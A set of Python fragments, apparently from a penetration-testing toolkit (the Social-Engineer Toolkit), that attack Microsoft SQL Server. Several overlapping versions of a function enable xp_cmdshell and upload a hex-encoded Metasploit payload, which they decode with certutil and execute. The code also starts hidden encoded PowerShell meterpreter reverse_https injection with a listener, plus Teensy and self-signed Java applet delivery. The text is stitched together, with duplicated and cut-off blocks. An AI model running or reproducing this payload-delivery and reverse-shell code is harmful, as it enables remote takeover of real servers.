core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
ipaddr = line.rstrip()
webserver = ipaddr
# grab port options from payloadgen.py
if os.path.isfile("src/program_junk/port.options"):
fileopen = file("src/program_junk/port.options", "r")
for line in fileopen:
port = line.rstrip()
else:
port = raw_input(setcore.setprompt("0", "Port you want to use for the connection back"))
# define the main variables here
# generate a random executable name per instance
exe_name = setcore.generate_random_string(10,10) + ".exe"
webserver = webserver + " " + port
# store for later
reverse_connection = webserver
webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE payload or SET payload
if os.path.isfile("src/program_junk/set.payload"):
fileopen = file("src/program_junk/set.payload", "r")
for line in fileopen:
payload_selection = line.rstrip()
else:
payload_selection = "SETSHELL"
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
""")
core.print_error("*** WARNING ***")
core.print_error(
"IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk"
)
core.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = core.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias {0} "
"-keystore mykeystore "
"-keypass mykeypass "
"-storepass mystorepass".format(random_string),
shell=True).wait()
# self-sign the applet
subprocess.Popen(
"jarsigner -keystore mykeystore "
"-storepass mystorepass "
"-keypass mykeypass "
"-signedjar Signed_Update.jar unsigned.jar {0}".format(random_string),
shell=True).wait()
core.return_continue()
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
with open(os.path.join(core.setdir, "web_clone/index.html")) as fileopen:
data = fileopen.read()
with open(os.path.join(core.setdir, "web_clone/index.html.new"), "w") as filewrite:
ipaddr = line.rstrip()
webserver = ipaddr
# grab port options from payloadgen.py
if os.path.isfile("src/program_junk/port.options"):
fileopen = file("src/program_junk/port.options", "r")
for line in fileopen:
port = line.rstrip()
else:
port = raw_input(
setcore.setprompt("0", "Port you want to use for the connection back"))
# define the main variables here
# generate a random executable name per instance
exe_name = setcore.generate_random_string(10, 10) + ".exe"
webserver = webserver + " " + port
# store for later
reverse_connection = webserver
webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE payload or SET payload
if os.path.isfile("src/program_junk/set.payload"):
fileopen = file("src/program_junk/set.payload", "r")
for line in fileopen:
payload_selection = line.rstrip()
else:
payload_selection = "SETSHELL"
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
#prep_powershell_payload()
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status("Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
#with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite = file(core.setdir + "/payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close()
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# launch powershell
#prep_powershell_payload()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
#with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
filewrite.close()
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metasploit takes a little bit to start...")
#child2.expect("Starting the payload handler", timeout=30000)
child2.expect("Processing", timeout=30000)
core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
exe=random_exe))
core.print_status("Delivery complete. Converting hex back to binary format.")
core.print_status("Dropping end header for binary format conversion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status("Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query(
"exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print(
"""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n"""
)
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status(
"Powershell injection was selected to deploy to the remote system (awesome)."
)
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower(
) == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input(
"Enter the path to your file you want to deploy to the system (ex /root/blah.exe):"
)
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error(
"Computers are hard. Find the path and try again. Defaulting to Metasploit payload."
)
choice1 = "1"
if choice1 == "1":
web_path = None
prep_powershell_payload()
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir),
shell=True).wait()
subprocess.Popen(
"cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir),
shell=True).wait()
subprocess.Popen(
"cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null"
% (core.setdir, core.setdir),
shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status(
"Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status(
"Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(
core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode..."
)
with open(os.path.join(core.setdir + "/payload_options.shellcode"),
"w") as filewrite:
# format needed for shellcode generation
filewrite.write(
"windows/meterpreter/reverse_https {0},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(
x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(
os.path.join(core.setdir +
"reports/powershell")))
with open(
os.path.join(
core.setdir +
"/reports/powershell/x86_powershell_injection.txt"),
"w") as filewrite:
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(
os.path.join(core.setdir +
"reports/powershell/powershell.rc"),
"w") as filewrite:
filewrite.write(
"use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(
os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir +
"reports/powershell/powershell.rc")))
core.print_status(
"Waiting for the listener to start first before we continue forward..."
)
core.print_status(
"Be patient, Metasploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
core.print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate.."
)
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query(
"exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'"
.format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status(
"Deploying payload to victim machine (hex): {bold}{data}{endc}\n"
.format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query(
"exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(
data=data, exe=random_exe))
core.print_status(
"Delivery complete. Converting hex back to binary format.")
core.print_status(
"Dropping end header for binary format conversion...")
conn.execute_query(
"exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'"
.format(random_exe))
core.print_status(
"Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled."
)
conn.execute_query(
"exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".
format(random_exe))
core.print_status(
"Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it."
)
conn.execute_query(
"exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status(
"Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"),
definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py",
shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = (
"exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command, ))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir +
"meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(
random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command, ))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
def deploy_hex2binary(ipaddr,port,username,password,option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10,15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe,random_exe))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
target_server.execute_query("RECONFIGURE")
target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
target_server.execute_query("RECONFIGURE")
except: pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.print_status("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
setcore.print_status("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.print_status("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
setcore.print_status("Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
setcore.print_status("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.print_status("Spawning seperate child process for listener...")
try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
port = fileopen.read().rstrip()
# if for some reason the port didnt get created we default to 443
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
# now back
os.chdir("src/program_junk/web_clone/")
setcore.print_status("Pausing 10 seconds to let the system catch up...")
time.sleep(10)
setcore.print_status("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command,))
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command,))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except: pass
except: pass
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
def deploy_hex2binary(ipaddr, port, username, password, option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username,
password)
setcore.PrintStatus("Connection established with SQL Server...")
setcore.PrintStatus("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk")
subprocess.Popen(
